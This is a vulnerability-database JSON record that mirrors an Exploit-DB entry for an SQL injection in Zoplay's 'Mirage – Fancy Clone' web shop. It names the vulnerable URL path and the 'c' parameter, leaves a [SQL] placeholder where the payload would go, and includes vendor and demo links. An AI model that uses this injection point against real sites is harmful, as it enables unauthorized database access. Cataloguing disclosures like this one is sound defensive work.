{"id": "EDB-ID:41593", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Mirage - SQL Injection", "description": "", "published": "2017-03-11T00:00:00", "modified": "2017-03-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/41593", "reporter": "Ihsan Sencan", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-08-16T08:18:11", "viewCount": 25, "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "_state": {"dependencies": 1661190352, "score": 1661184847}, "_internal": {"score_hash": "218d66458ba66b3a645c109a6f71cd36"}, "sourceHref": "https://www.exploit-db.com/download/41593", "sourceData": "# # # # # \r\n# Exploit Title: Mirage \u2013 Fancy Clone - SQL Injection\r\n# Google Dork: N/A\r\n# Date: 11.03.2017\r\n# Vendor Homepage: https://www.zoplay.com/\r\n# Software: https://www.zoplay.com/web/multi-vendor-clone-website/\r\n# Demo: http://fancyclone.zoplay.com/\r\n# Version: N/A\r\n# Tested on: Win7 x64, Kali Linux x64\r\n# # # # # \r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Mail: ihsan[@]ihsan[.]net\r\n# # # # #\r\n# SQL Injection/Exploit :\r\n# http://localhost/[PATH]/shopby/IhsanSencan?c=[SQL]\r\n# Duplicate entry 'fancyclone\r\n# Etc..\r\n# # # # #", "osvdbidlist": [], "exploitType": "webapps", "verified": false}
{}